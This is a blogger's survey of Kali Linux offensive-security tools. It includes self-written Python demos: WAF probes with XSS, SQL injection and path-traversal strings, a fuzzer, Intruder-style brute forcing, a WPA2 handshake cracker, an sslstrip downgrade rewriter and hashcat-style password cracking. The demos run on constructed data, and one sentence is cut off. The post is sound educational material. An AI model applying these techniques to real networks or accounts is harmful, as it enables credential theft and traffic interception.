In my previous post I started documenting my efforts to learn about offensive security by researching vulnerability reports. In the present post, I will document my efforts to learn about offensive security by exploring a Linux distro designed specifically for that purpose: Kali Linux.
Kali is a Linux distro based on Debian. It tracks Debian Testing and adds its own package repositories, a kernel patched for things like wireless packet injection, some changes to the desktop, and a wide array of pre-packaged hacking tools; underneath, it is still Debian. I can only assume the name comes from the Hindu goddess Kali, who is the goddess of death and destruction, which kinda resonates with the whole theme of offensive security and penetration testing. Kali is the successor of BackTrack Linux, but it was not simply a rename: BackTrack was Ubuntu-based, and Kali was rebuilt from scratch on Debian and first released in 2013.
My method of research has been pretty obvious and unoriginal: All I do is look through the main menu on the top titlebar and see what software titles I can find there, then I look them up on the Internet using a standard search engine. Here’s what I’ve found…
lbd and wafw00f
The first step of any online attack is reconnaissance. When attacking a server, either for pen-testing purposes or for black hat hacking purposes, it helps to know what sits between you and the application: a load balancer, a web application firewall (WAF), or both. Kali Linux has two small tools for this. lbd detects load balancing, while wafw00f detects and fingerprints a WAF. Note that neither tool detects an IDS or IPS as such; a passive IDS never touches your packets and is invisible from the client side, and the most you can learn about an inline IPS is that some of your requests get blocked.
Let’s look at lbd first. Its name is an acronym for “Load Balancing Detector”. Load balancing is used on larger sites that handle massive amounts of traffic from all over the world and therefore must spread it over multiple redundant servers. A load balancer is essentially a reverse proxy that accepts incoming connections and hands each one to a backend according to some policy (round robin, least connections, and so on). Because the load balancer is the only thing the client ever talks to, it is also the natural place to terminate TLS and to put a WAF or IPS, and it can absorb some denial-of-service traffic such as SYN floods before it reaches the application. lbd looks for two kinds of load balancing: DNS-based, where the hostname resolves to several A records, and HTTP-based, where the Server or Date headers differ between successive requests, which suggests that more than one backend answered.
wafw00f is a reconnaissance program that detects whether a web application firewall (WAF) is protecting the server, and tries to identify which product it is. A WAF is different from a regular firewall in that whereas a regular firewall filters packets at the network and transport layers (IP addresses, ports, connection state), a WAF inspects traffic at the application layer, allowing for much more sophisticated attack detection and prevention based on patterns in the HTTP requests themselves: URL paths, query strings, headers, cookies, and bodies, as opposed to just addresses and ports.
Both tools work by sending ordinary requests to a server and analyzing the responses (lbd is a shell script, wafw00f a Python program, and neither needs special privileges). lbd resolves the hostname and compares headers across repeated HTTP requests as described above. wafw00f first sends a benign request to establish a baseline, then sends requests that look like attacks (for example a query string carrying a typical XSS or SQL injection payload) and looks for the WAF’s reaction: a changed status code such as 403 or 406, a block page, or a vendor-specific header or cookie. You can use this information to know what kind of defenses you’re dealing with before you send anything noisier at the target, and to expect that your attack traffic may be logged or blocked.
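To make the two heuristics concrete, here is a toy reimplementation of both checks run against canned data. This is an added example written for this post, not the code of either tool: the DNS answers and HTTP responses are constructed inline so it runs offline, and apart from the Cloudflare CF-RAY header (which is real) the signature logic is illustrative, not wafw00f’s fingerprint database.

```python
"""Toy versions of the lbd and wafw00f heuristics, run against constructed data."""
from dataclasses import dataclass, field
from email.utils import parsedate_to_datetime


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""

    def header(self, name):
        """Case-insensitive header lookup."""
        return next((v for k, v in self.headers.items() if k.lower() == name.lower()), None)


# ---- lbd: load balancing detection -------------------------------------

def dns_load_balanced(a_records):
    """DNS round robin: the hostname resolves to more than one address."""
    return len(set(a_records)) > 1


def http_load_balanced(responses):
    """Several backends behind one name give themselves away by different
    Server banners, or by Date headers that run backwards between successive
    requests because the backends' clocks are not in step."""
    servers = {r.header("Server") for r in responses}
    if len(servers) > 1:
        return True
    dates = [parsedate_to_datetime(r.header("Date")) for r in responses if r.header("Date")]
    return any(later < earlier for earlier, later in zip(dates, dates[1:]))


# ---- wafw00f: WAF detection --------------------------------------------

ATTACK_PROBES = [
    "/?q=<script>alert(1)</script>",
    "/?id=1%27%20OR%20%271%27%3D%271",
    "/?f=../../../../etc/passwd",
]


def fingerprint(resp):
    """Vendor-specific marker (only Cloudflare is modelled here)."""
    if resp.header("CF-RAY") is not None or (resp.header("Server") or "").lower() == "cloudflare":
        return "Cloudflare"
    return None


def detect_waf(send):
    """send(path) -> Response.  Take a benign baseline, then send attack-like
    probes and look for a reaction: a vendor fingerprint, or a blocking status
    code that the baseline request did not get."""
    baseline = send("/")
    for probe in ATTACK_PROBES:
        resp = send(probe)
        name = fingerprint(resp)
        if name:
            return name
        if resp.status != baseline.status and resp.status in (403, 406, 419, 429, 501):
            return "generic (attack-like request blocked)"
    return None


# ---- constructed targets -----------------------------------------------

def behind_cloudflare(path):
    """Constructed: blocks anything that looks like an attack, tags responses."""
    if "<script>" in path or "%27" in path or "../" in path:
        return Response(403, {"Server": "cloudflare", "CF-RAY": "7d1f-LHR"}, "Attention Required!")
    return Response(200, {"Server": "cloudflare"}, "<html>hi</html>")


def unprotected(path):
    """Constructed: answers everything the same way."""
    return Response(200, {"Server": "nginx"}, "<html>hi</html>")


ROUND_ROBIN = ["192.0.2.10", "192.0.2.11", "192.0.2.10"]   # two A records seen over three lookups
SKEWED_BACKENDS = [                                       # second response came from a backend 25 s behind
    Response(200, {"Server": "nginx", "Date": "Tue, 01 Jan 2019 10:00:05 GMT"}),
    Response(200, {"Server": "nginx", "Date": "Tue, 01 Jan 2019 09:59:40 GMT"}),
    Response(200, {"Server": "nginx", "Date": "Tue, 01 Jan 2019 10:00:06 GMT"}),
]
```

The Date check is the interesting one: a single server never answers a later request with an earlier timestamp, so a backwards step in Date across a burst of requests is strong evidence of more than one backend even when their Server banners are identical.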
SPIKE

SPIKE is a framework, written in C by Dave Aitel, for writing fuzzers: programs that feed a target application malformed, oversized, or otherwise unexpected input and watch for it to misbehave. Fuzzing is not reverse engineering as such; it is a black-box testing technique, which is exactly why it is useful when you have no source code and no convenient way to debug or disassemble the target, for instance a network service running on a remote host. It basically involves sending specially crafted messages, which may be deliberately malformed, to the service and seeing what kinds of responses you get. A hung connection, a reset, or an outright crash points at a parsing bug, typically a memory-safety error such as a stack or heap overflow, and a crash whose behaviour depends on the input you sent is where exploit development starts. Fuzzing network services is one of the common ways of finding the bugs that bug bounties pay for.
SPIKE is not a debugger and does not replace gdb. It is a library for generating protocol messages, plus a couple of ready-made senders (generic_send_tcp and generic_send_udp) that interpret simple scripts. You write one script per message type you want to fuzz; these scripts are called spikes, and they have the extension .spk. A spike describes the message as a sequence of blocks: fixed strings that must stay as they are (s_string), variable strings (s_string_variable) that SPIKE replaces in turn with each entry of its built-in library of fuzz values (very long strings, format-string specifiers, boundary integers, and so on), and length fields (the s_block_size_* family) that are recomputed for every mutation so the framing stays valid while the contents do not. The sender walks through every variable and every fuzz value, one request per test case, printing which variable and which string it is on. You watch the target under a debugger at the same time, and the combination tells you which spike, and which value within it, caused the crash; the SKIPVAR and SKIPSTR arguments of generic_send_tcp let you resume from that position instead of starting over.
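The block-based idea is easier to see in code than in prose. The following is an added example written for this post, a miniature fuzzer in Python in the spirit of SPIKE; it is not SPIKE, and the block kinds it defines are this example’s own, not SPIKE’s API. The target is a constructed toy “LOGIN” parser with a deliberate fixed-size buffer bug, so the fuzz loop has something to find, and everything runs in-process rather than over a socket.

```python
"""A miniature block-based fuzzer: fixed blocks, variable blocks, and length
fields that are patched after mutation so the framing stays valid."""
import struct

# Fuzz strings in the SPIKE style: overlong data, format specifiers, odd bytes.
FUZZ_STRINGS = [
    b"A" * 64, b"A" * 300, b"A" * 5000,
    b"%s%s%s%s%n", b"%x" * 64,
    b"\x00", b"\xff" * 4, b"-1", b"4294967295",
]

# A spike is a list of (kind, argument) blocks:
#   ("fixed", bytes)        literal that is never mutated            (SPIKE: s_string)
#   ("variable", bytes)     default value, replaced by fuzz strings  (s_string_variable)
#   ("size_be16", name)     2-byte big-endian length of a named block (s_block_size_*)
#   ("block_start", name) / ("block_end", name)   the extent that size field measures


def render(spike, var_index=None, value=None):
    """Render a spike to bytes, substituting `value` for variable number
    `var_index`, then patch every size field so the length is right no
    matter how large the mutated block became."""
    out = bytearray()
    size_fields, starts, ends = [], {}, {}
    var_no = 0
    for kind, arg in spike:
        if kind == "fixed":
            out += arg
        elif kind == "variable":
            out += value if var_no == var_index else arg
            var_no += 1
        elif kind == "size_be16":
            size_fields.append((len(out), arg))
            out += b"\x00\x00"                      # placeholder, fixed up below
        elif kind == "block_start":
            starts[arg] = len(out)
        elif kind == "block_end":
            ends[arg] = len(out)
        else:
            raise ValueError(kind)
    for offset, name in size_fields:
        out[offset:offset + 2] = struct.pack(">H", (ends[name] - starts[name]) & 0xFFFF)
    return bytes(out)


def count_variables(spike):
    return sum(1 for kind, _ in spike if kind == "variable")


def fuzz(spike, target):
    """The generic_send_tcp loop: every variable, every fuzz string, one
    message each.  An exception from `target` stands in for a crash; the
    first crashing case is returned so you know which variable and which
    string caused it (the equivalent of SPIKE's SKIPVAR / SKIPSTR position)."""
    for var in range(count_variables(spike)):
        for value in FUZZ_STRINGS:
            message = render(spike, var, value)
            try:
                target(message)
            except Exception as exc:
                return {"variable": var, "value": value, "message": message, "error": repr(exc)}
    return None


# Constructed target: trusts the length field, then copies into a 32-byte buffer.
def toy_server(message):
    if not message.startswith(b"LOGIN "):
        return "bad command"
    body = message[6:]
    (n,) = struct.unpack(">H", body[:2])
    name = body[2:2 + n]
    buf = bytearray(32)
    if len(name) > len(buf):
        raise MemoryError("%d bytes written into a 32-byte buffer" % len(name))
    buf[:len(name)] = name
    return "ok"


LOGIN_SPIKE = [
    ("fixed", b"LOGIN "),
    ("size_be16", "user"),
    ("block_start", "user"),
    ("variable", b"alice"),
    ("block_end", "user"),
    ("fixed", b"\r\n"),
]
```

The size field is the point of the exercise: a parser that checks the length prefix against the actual data would reject a naively mutated message before ever reaching the vulnerable copy, so the fuzzer has to keep the framing honest and lie only inside it.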
Burp Suite

No survey of Kali Linux software would be complete without this one. Burp Suite is probably the quintessential tool for testing web applications. At its heart is an intercepting proxy: you point a browser at it, and every request and response passes through Burp, where you can inspect, modify, replay, and automate it. On top of that it has a scanner that checks for a large catalogue of known vulnerability classes, XSS and SQL injection among many others. “Every known vulnerability under the sun” is a stretch, though: automated scanners miss logic flaws and anything that requires understanding what the application is for, which is why the manual tools matter as much as the scanner.
Burp Suite has a few different components. The one you touch first is Burp Proxy, which sits between the browser and the server and records every HTTP request and response for further analysis. The scanner (part of the paid Professional edition) drives Burp’s built-in Chromium-based browser in a non-interactive mode; this browser-powered scanning lets Burp crawl and test pages that only work once their JavaScript has run, which a plain HTTP crawler cannot do. Everything the proxy and the crawler see goes into the site map, a tree of every URL Burp has discovered on the target, alongside a list of the issues the scanner has found.
If you want to work on individual requests by hand, you use the proxy together with a browser. You can either use Burp’s built-in browser or use an external browser and configure it to route traffic through Burp Proxy, which listens on localhost port 8080 by default. Once a request has been intercepted, you can edit it in place before it goes out, or send it to Repeater to resend modified copies one at a time while you study the responses. Intruder is the automated version of the same idea: you mark positions in the request (a parameter value, a header, a cookie) and Burp substitutes payloads from a list into them, one request per payload. That is how you fuzz a parameter, run a wordlist of SQL injection or command injection strings against it, brute-force a login, or simply send the same request with a different User-Agent. One practical note: to intercept HTTPS without certificate warnings, install Burp’s CA certificate in the browser; Burp then generates a certificate for each host signed by that CA so it can terminate TLS on the browser side and open its own connection to the server.
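Intruder’s four attack types are worth understanding precisely, because choosing the wrong one either misses combinations or multiplies the request count. The following is an added example written for this post, not Burp’s code or its extender API: it marks payload positions in a raw request template with § markers the way the Intruder UI does, and reproduces the four attack types plus the Content-Length fix-up Burp applies after every edit. The request and payload lists are constructed here; nothing is sent.

```python
"""Burp Intruder's attack types reimplemented over a raw HTTP request template."""
import itertools
import re

POSITION = re.compile(r"§([^§]*)§")   # §default§ marks one payload position


def positions(template):
    """Default value of each marked position, left to right."""
    return POSITION.findall(template)


def fill(template, values):
    """Substitute one value per position.  A callable replacement means the
    payload is inserted literally, with no backslash-escape processing."""
    values = iter(values)
    return POSITION.sub(lambda m: next(values), template)


def fix_content_length(request):
    """Burp updates Content-Length after every edit; so must we."""
    head, sep, body = request.partition("\r\n\r\n")
    head = re.sub(r"(?im)^Content-Length:[^\r\n]*",
                  "Content-Length: %d" % len(body.encode()), head)
    return head + sep + body


def sniper(template, payloads):
    """One position at a time; the others keep their default value."""
    defaults = positions(template)
    for i in range(len(defaults)):
        for p in payloads:
            vals = list(defaults)
            vals[i] = p
            yield fix_content_length(fill(template, vals))


def battering_ram(template, payloads):
    """The same payload in every position at once."""
    n = len(positions(template))
    for p in payloads:
        yield fix_content_length(fill(template, [p] * n))


def pitchfork(template, *payload_sets):
    """One payload set per position, walked in lock-step (row 1 with row 1, ...)."""
    for combo in zip(*payload_sets):
        yield fix_content_length(fill(template, combo))


def cluster_bomb(template, *payload_sets):
    """One payload set per position, every combination."""
    for combo in itertools.product(*payload_sets):
        yield fix_content_length(fill(template, combo))


# Constructed request template with two positions, as captured by the proxy.
TEMPLATE = (
    "POST /login HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "user=§admin§&pass=§secret§"
)
USERS = ["admin", "alice"]
PASSWORDS = ["Password1", "Summer2019", "' OR 1=1--"]
```

Sniper is the one to reach for when fuzzing a single parameter for injection; cluster bomb is the one for credential guessing, and its request count is the product of the list sizes, which is what you will be rate-limited on.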
Metasploit

Another central tool in the Kali Linux arsenal is the Metasploit Framework. Metasploit is a suite of command line tools used for finding, developing, and launching exploits. It contains a command line interface in the form of msfconsole; auxiliary modules for scanning and service enumeration (plus db_nmap, which runs Nmap and imports the results); exploit modules, each corresponding to one vulnerability; payloads that an exploit delivers to the target, the best known being Meterpreter, an in-memory agent that gives you a shell, file transfer, pivoting, and post-exploitation commands on the compromised host; a PostgreSQL-backed database for keeping track of hosts, services, credentials, and vulnerabilities; and scripting capabilities through resource scripts and the framework’s Ruby API (external modules can also be written in Python or Go).
One of the primary applications of Metasploit is the development and automation of exploits. Modules for exploits are often provided by the community, usually whenever a new exploit is discovered, but the real fun IMO is in writing custom modules for your own exploits (keep in mind I haven’t actually done this yet, so I’m speaking hypothetically here). Exploit modules for Metasploit are written in the Ruby programming language, using various libraries, APIs, and plugins provided by the framework. In addition to basic exploitation techniques, Metasploit’s Ruby libraries provide functionality for evading IDS’s, IPS’s, and antivirus programs through randomization and
Metasploit doesn’t just provide the tools for hacking systems. Rapid7, the company behind it, also provides a convenient practice target called Metasploitable. This is an intentionally vulnerable Linux system that you install in a virtual machine and then attack by its IP address. One caveat: give that VM a host-only or internal virtual network rather than a bridged one, because it is full of remotely exploitable services and should never be reachable from a real network. While I was doing my research on Kali Linux software, I discovered a number of these “intentionally vulnerable” applications, which provide a wealth of completely legal targets for recreational hacking. Other names in this category include DVWA – the Damn Vulnerable Web Application, portswigger-labs.net – a sandboxed website for pen-testing (provided by the people who wrote Burp Suite), and Vulnserver – a deliberately exploitable Windows TCP server that is a classic first target for exactly the kind of fuzzing SPIKE was built for.
Aircrack-ng

Aircrack-ng is a suite of tools for auditing WiFi security: capturing frames, injecting traffic, and recovering network keys. It can recover WEP keys outright, because WEP’s use of RC4 is so badly flawed that enough captured traffic yields the key by statistical analysis. WPA and WPA2 are a different story: those protocols are not broken in that way, so against a WPA/WPA2-PSK network aircrack-ng performs a dictionary attack, capturing the four-way handshake between a client and the access point and then testing candidate passphrases against it offline. A strong passphrase defeats this; a weak one falls quickly. The suite is very modular in nature, consisting of a collection of different programs and scripts that each do one thing very well, much in keeping with the general Unix philosophy. These tools are used in succession, with each representing one step of the WiFi cracking process.
Let’s explore a typical sequence of Aircrack-ng tools. The main program is aircrack-ng, which takes a capture file of raw WiFi frames and recovers the key: statistically for WEP, or by trying passphrases from a wordlist against a captured handshake for WPA/WPA2. (Decrypting a capture with a key you have recovered is a separate tool, airdecap-ng.) Of course you first need the capture. To get it you use airodump-ng, which listens to the frames the wireless interface sees while in monitor mode and writes them to disk, listing the nearby access points and their clients as it goes. The problem with this is that the interface is not in monitor mode by default. To switch in and out of monitor mode, you use a third program called airmon-ng, which also kills the network manager processes that would otherwise fight you for the interface. Monitor mode is one of several modes a wireless interface can be in, and it basically means that the card passes up every frame it hears on its channel, from all networks in the vicinity, regardless of whether it is associated with them or can actually decrypt the frames. For WPA/WPA2 the capture also has to contain a handshake, which only happens when a client connects; rather than wait for one, aireplay-ng can send deauthentication frames to kick a client off so that it reconnects while you are listening.
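What aircrack-ng actually does with a captured WPA2 handshake is a fixed chain of key derivations per candidate passphrase, and it is short enough to write out. The following is an added example written for this post, independent of aircrack-ng’s code: the handshake (SSID, MAC addresses, nonces, and EAPOL-Key message 2) is constructed inline from a known passphrase so that it runs offline, and the “wordlist” is a handful of candidates. The derivations follow IEEE 802.11i: PMK from PBKDF2-HMAC-SHA1, PTK from PRF-384, and the MIC as HMAC-SHA1 truncated to 128 bits (WPA2 with CCMP; original WPA with TKIP uses HMAC-MD5 instead).

```python
"""WPA2-PSK handshake verification: the computation a cracker repeats per guess."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID.
    This is the slow step, and the reason GPUs matter for this attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """Pairwise Transient Key.  Both sides sort the MACs and nonces so they
    derive the same key; the first 16 bytes are the KCK that keys the MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 key descriptor version 2: HMAC-SHA1 over the whole EAPOL-Key
    frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """The inner loop: passphrase -> PMK -> PTK -> KCK -> MIC over message 2,
    compared with the MIC the client actually sent."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["client_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def build_handshake(passphrase, ssid="TestNet"):
    """Constructed capture: message 2 of the four-way handshake as airodump-ng
    would have recorded it, with the MIC field zeroed for verification."""
    ap_mac = bytes.fromhex("020000000001")
    client_mac = bytes.fromhex("020000000002")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # EAPOL-Key body: descriptor type 2 (RSN), key info 0x010a (pairwise, MIC
    # present: message 2), key length 16, replay counter 1, SNonce, key IV,
    # RSC, key ID, MIC (zeroed), key data length 0.  Prefixed by the 802.1X header.
    body = (struct.pack(">BHHQ", 2, 0x010A, 16, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = struct.pack(">BBH", 2, 3, len(body)) + body
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, client_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}
```

Two things follow directly from the code. Only message 2 (or 3) plus both nonces and both MACs are needed, which is why a partial handshake is often enough for the tools; and because the SSID is the PBKDF2 salt, precomputed tables only help against networks with common SSIDs, while a unique SSID forces the full 4096 rounds for every guess.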
sslstrip

sslstrip is a tool written by Moxie Marlinspike to demonstrate an attack he presented at Black Hat DC in 2009. It is not an attack on the SSL/TLS cryptography at all; it exploits the way browsers get to HTTPS in the first place. Most users never type “https://”. They type a hostname, land on plain HTTP, and are then sent to HTTPS by a redirect or a link, and that transition happens over unencrypted HTTP where an attacker on the path can remove it. The result is what’s known as a protocol downgrade attack: forcing the parties to abandon an up-to-date, secure protocol in favor of a less secure one to make exploitation easier. The purpose of sslstrip is to keep the victim’s browser talking plain HTTP while it believes (or fails to notice whether) the session is secure.
The way the attack works is as follows. First you need to be in a position where you can intercept traffic between the victim and the Internet: on the same WiFi network using ARP spoofing to pose as the gateway, on a hostile access point you run yourself, or on a router you control. No keys are stolen and nothing is decrypted. Instead, the victim’s outbound port 80 traffic is redirected to sslstrip, which acts as a transparent proxy: it forwards each request to the real site, and whenever a response contains “https://” links or a redirect to an HTTPS URL, it rewrites them to “http://” and remembers which URLs it changed. When the victim then follows one of those links, sslstrip itself opens a genuine HTTPS connection to the server and relays the content back over plain HTTP, so the server sees a valid TLS session and the victim sees a working site with no lock icon. Everything the victim submits, passwords included, passes through the attacker in the clear, and the idea is to do all of this transparently, without either end noticing. The defence is HTTP Strict Transport Security: once a browser has seen an HSTS header from a site (or has the site on its preload list), it refuses to load that site over plain HTTP no matter what any link or redirect says, so there is no transition left to strip.
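The rewriting step is the whole trick, and it is only a few lines. The following is an added example written for this post, not sslstrip’s code: strip_response does what the proxy does to each plain-HTTP response it relays (downgrade https links and redirects, drop the Secure flag from cookies since a Secure cookie would never be sent back over http, and remember which hosts it touched so the victim’s later http requests for them are re-upgraded to https on the server side), and hsts_blocks_downgrade models why HSTS defeats it. The server response is constructed inline.

```python
"""The rewriting step of an sslstrip-style downgrade, on a constructed response."""
import re

HTTPS_URL = re.compile(r"https://([A-Za-z0-9.\-]+)")


class Stripper:
    def __init__(self):
        self.stripped_hosts = set()

    def _downgrade(self, url):
        self.stripped_hosts.add(HTTPS_URL.match(url).group(1))
        return "http://" + url[len("https://"):]

    def strip_response(self, headers, body):
        """Return (headers, body) as the victim's browser will see them."""
        headers = dict(headers)
        location = headers.get("Location", "")
        if location.startswith("https://"):          # server tried to redirect to HTTPS
            headers["Location"] = self._downgrade(location)
        if "Set-Cookie" in headers:                   # browser would withhold a Secure cookie over http
            headers["Set-Cookie"] = re.sub(r";\s*Secure\b", "", headers["Set-Cookie"], flags=re.I)
        body = HTTPS_URL.sub(lambda m: self._downgrade(m.group(0)), body)
        return headers, body

    def upstream_scheme(self, host):
        """For a victim request to http://host/..., the scheme the proxy uses
        towards the real server.  Stripped hosts get a genuine TLS connection,
        so the server sees nothing unusual."""
        return "https" if host in self.stripped_hosts else "http"


def hsts_blocks_downgrade(hsts_cache, host):
    """A browser holding an HSTS entry for `host` (from an earlier visit or the
    preload list) rewrites http://host to https://host internally before any
    request leaves, so the proxy never gets a plain-HTTP request to answer."""
    return host in hsts_cache


# Constructed server response to a plain-HTTP request, before stripping.
RESPONSE_HEADERS = {
    "Location": "https://bank.example/login",
    "Set-Cookie": "session=abc123; Secure; HttpOnly",
}
RESPONSE_BODY = ('<a href="https://bank.example/login">Log in</a> '
                 '<a href="http://news.example/">News</a>')
```

Note what the attacker does not need: no certificate, no key, no cryptographic break. That is also why the fix is a policy the browser enforces before the first request, rather than anything in TLS itself.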
Hashcat

Hashcat is a password recovery program: given password hashes in any of several hundred formats (MD4, MD5, the SHA family, the Unix crypt variants such as sha512crypt and bcrypt, NTLM, WPA handshakes, and many more), it finds the passwords that produce them. There used to be two versions of this program: regular Hashcat, which did all its processing on the CPU, and oclHashcat, which used the GPU for much better performance. Since version 3.0 in 2016 the two have been merged into a single hashcat that runs on whatever OpenCL devices are present (and, since 6.0, CUDA devices as well), CPUs included.
Hashcat is built on the OpenCL framework, a cross-platform standard for programming many kinds of compute devices (CPUs, GPUs, FPGAs) from C or C++. There are two halves to the interface: the kernels, which do the actual computation and are written in OpenCL C, a variant of C99 designed for the framework; and the host API for C or C++, which discovers devices, compiles kernels, copies data to and from the device, and launches the work. The two halves are always used together. Kernels are compiled just in time, on the user’s machine, into the native instruction set of whichever device will run them, which is what makes OpenCL code portable across device types. So the same hashing kernel can be compiled to x86 machine code to run on an Intel CPU, or to NVIDIA’s GPU instruction set (I don’t know what the official name for the nVidia architecture is) to run on an NVIDIA card.
Running Hashcat on the GPU is so much faster because hashing candidate passwords is embarrassingly parallel: a GPU has thousands of simple cores and evaluates thousands of candidates at once, whereas a CPU has a handful of fast ones. That matters because a cracker typically has to try millions or billions of candidates before finding a match. The candidates come from a wordlist (straight mode), from exhaustive enumeration over a mask such as ?u?l?l?l?d?d (brute-force mode), or from hybrids of the two, and rules can be applied to wordlist entries to generate the mutations people actually use (capitalise the first letter, append a year, swap a for @). Each candidate is hashed and compared against the targets until one matches. Strictly speaking this is a guessing attack, dictionary or brute force, not a preimage attack in the cryptographic sense: the hash function is not being broken, the password space is being searched. That is also why slow, salted hash formats such as bcrypt or Argon2 matter: they cut the guesses-per-second rate by orders of magnitude and make precomputation shared across users useless.
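The attack modes are easiest to understand by implementing the small versions. The following is an added example written for this post, not hashcat’s code: it reproduces straight mode with a subset of hashcat’s rule syntax (“:” no-op, l, u, c, r, t, $X append, ^X prepend, sXY substitute) and mask mode with the ?l ?u ?d ?s character classes, and cracks a few MD5 hashes constructed here from known passwords. The lookup is a set membership test, which is only possible because the targets are unsalted; with per-user salts every target would need its own hashing pass.

```python
"""Hashcat attack modes in miniature: straight (-a 0) with rules, and mask (-a 3)."""
import hashlib
import itertools

MASK_CHARSETS = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}


def apply_rule(rule, word):
    """Apply one rule string left to right.  Subset of hashcat's rule language;
    spaces between functions are ignored as in hashcat's rule files."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op in ": ":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "r":
            word = word[::-1]
        elif op == "t":
            word = word.swapcase()
        elif op == "$":
            i += 1
            word = word + rule[i]
        elif op == "^":
            i += 1
            word = rule[i] + word
        elif op == "s":
            word = word.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError("unsupported rule function %r" % op)
        i += 1
    return word


def candidates_straight(wordlist, rules=(":",)):
    """-a 0: every word, through every rule."""
    for word in wordlist:
        for rule in rules:
            yield apply_rule(rule, word)


def candidates_mask(mask):
    """-a 3: expand a mask such as '?u?l?l?d?d'; literal characters stay fixed."""
    sets = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            sets.append(MASK_CHARSETS[mask[i + 1]])
            i += 2
        else:
            sets.append(mask[i])
            i += 1
    for combo in itertools.product(*sets):
        yield "".join(combo)


def crack(targets, candidates, algo="md5"):
    """targets: {hex digest: label}.  Hash each candidate once and look it up
    against every remaining target; stop when all are found."""
    remaining = dict(targets)
    found = {}
    for cand in candidates:
        digest = hashlib.new(algo, cand.encode()).hexdigest()
        if digest in remaining:
            found[remaining.pop(digest)] = cand
            if not remaining:
                break
    return found


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


# Constructed targets and inputs: three users' unsalted MD5 hashes.
TARGETS = {md5_hex("Summer2019!"): "alice", md5_hex("drowssap"): "bob", md5_hex("Abc12"): "carol"}
WORDLIST = ["summer", "password", "welcome"]
RULES = [":", "c $2 $0 $1 $9 $!", "r"]
```

Two of the three fall to a three-word list with three rules, which is the usual story: rules encode human habits far more cheaply than a mask can enumerate them. The third needs the ?u?l?l?d?d mask, and even that tiny five-character space is 1.7 million candidates, which is why the keyspace, not the hash, is what a policy should aim to enlarge.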
Mimikatz

Mimikatz is a lot like sslstrip in that it was originally written as a proof of concept for one specific weakness and grew into a much more general tool. Its author, Benjamin Delpy, wrote it to demonstrate that Windows kept users’ plaintext passwords in the memory of the LSASS process (for the WDigest authentication provider), from where a local administrator could simply read them out. Today Mimikatz covers Windows authentication in general: it extracts credentials from LSASS and the registry (plaintext passwords where they are still present, NTLM hashes, and Kerberos tickets) and can replay them to authenticate as the user they belong to. It is a Windows executable; Kali ships the binary so you have it on hand to drop onto a compromised Windows host, and the same techniques are built into Kali-native tools such as Impacket.
In researching this particular tool, I learned about a number of different exploits pertaining to authentication. One of these is pass-the-hash. NTLM authentication never sends the password, only a response computed from the NT hash (the MD4 of the UTF-16 password) and a challenge from the server, so anyone holding the hash can produce a valid response without ever knowing or cracking the password. The hash is not sniffed off the wire (it never appears there); it is read out of the memory or registry of a machine you already control, and the point is that this makes any preimage or dictionary attack on it unnecessary. Kerberos does not send hashes either, which is where the Kerberos variants come in: pass-the-ticket reuses a stolen Kerberos ticket (a TGT or a service ticket) by loading it into the current session, and overpass-the-hash uses a stolen NT hash to request a fresh TGT. There’s also pass-the-cache, which extends Mimikatz’s reach to the *Nix world: Linux and macOS Kerberos clients keep their tickets in a credential cache file, and Mimikatz can take a stolen cache and inject its tickets into a Windows session.
So that was just a non-comprehensive survey of some of the software available on Kali Linux. I definitely learned a lot from this little research project, and I feel like I now have the tools to do pen-testing and bug bounty hunting without breaking the law. Farewell, and happy hacking!